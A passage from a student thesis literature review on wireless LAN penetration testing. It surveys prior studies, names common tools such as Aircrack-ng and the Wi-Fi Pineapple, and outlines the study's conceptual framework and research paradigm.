networks, including rogue access point detection, and man-in-the-middle (MITM)

attacks.

Moreover, in the study by (G. Jayasuryapal et al., 2021)[57], entitled “A Survey on

Network Penetration Testing,” it is essential to a penetration tester to have a reliable

methodology to do thorough network testing. The steps include information collection,

scanning, enumeration, post-exploitation, and reporting. Furthermore, in the study by

(Sudhakar et al., (2018)[56], entitled “Penetration testing and security analysis of wireless

networks: A survey," the researchers intended to determine the current wireless network

security assessment tools and penetration testing techniques. They also looked at a

variety of other penetration testing methodologies such as vulnerability scanning,

exploitation, and post-exploitation. The researchers also examined a range of wireless

network vulnerabilities, such as Man-in-the-Middle, Denial-of-Service, and Rogue

Access Point attacks.

35
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

Another study by (S. Mishra, 2021)[58] entitled “Efficacy of Unconventional

Penetration Testing Practices,” intends to utilized an easier way to penetrate the network.

Unconventional ways to test for vulnerabilities don't require as much time-consuming

code writing, they are easier to manage and add more to the security assessment. And

since technology is always evolving and never remains the same for long. People are not

used to new methods of penetration testing being established. This study allowed us, the

researchers, to be flexible in adjusting to any changes in pen-testing. After reading and

researching Penetration Testing-related materials, we, the researchers, gained some useful

insights for furthering our research. These materials helped us in better understanding

how penetration testing works.

CONCEPTUAL FRAMEWORK

The researchers used Figure 1 as a conceptual diagram to clearly illustrate their

proposed project. The research is divided into three phases: input, process, and output.

The input phase will encompass the WLAN pen-testing software suite Aircrack-ng, a pre-

installed module in Kali Linux designed for monitoring, attacking, and testing. As well as

the Alfa AWUS036HHA USB Wi-Fi adapter and the Wi-Fi Pineapple Mark VII + AC

Tactical, which are the commonly used hardware for WLAN pen-testing. The process

phase will be the integration. The last phase is output which is the Wireless Local Area

Network (WLAN) pen-testing methods.

INPUT PROCESS OUTPUT

36
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

Pen-testing
software for
WLAN
WLAN
Integration pen-testing
methods

Commonly used
hardware for pen-
testing WLAN

Figure 1: Conceptual Framework of the Study

Research Paradigm

Design Science

Grounded Theory Action Research

System Development
37
 CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

Figure 2: Research Paradigm of the Study

This research paradigm was adopted by Dr. Napoleon Meimban, a former PSU

Urdaneta City Campus faculty and a former Dean of PSU-Graduate Studies. It was

adapted and revised by Dr. Kenneth Oliver S. Lopez of PSU-UCC to fit the needs of the

Bachelor of Science in Computer Engineering’s research paradigm. Design Science wi-fi

protocols claim to provide security solutions such as wired networks; they are still of

interest until today. However, such protocols are not fully secure and can be target of key

recovery attacks in the real world. In this paper, the researchers explain how Wireless

Local Area Network attacks work and show that they seem harder in practice than they

do in theory. Their chances of success have often been miscalculated, and their success

depends on the test environment, which is different for each contribution. As a basis to

determine the security strength of a wireless network, the researchers decided to perform

a penetration testing on the WLAN of the College of Engineering and Architecture of

PSU-UCC. Grounded Theory the researchers will determine what is the suitable

equipment to be used in penetration testing. The researchers will utilize the versatility and

conveniency of the equipment to pen-test the said WLANs. Action Research the

researchers’ penetration testing has two phases the reconnaissance phase and the

penetration testing phase. System Development the researchers will discuss the step-by-

step procedures on how to pen-test Wireless Local Area Network.

38
CHAPTER II: REVIEW OF RELATED LITERATURE AND STUDIES

39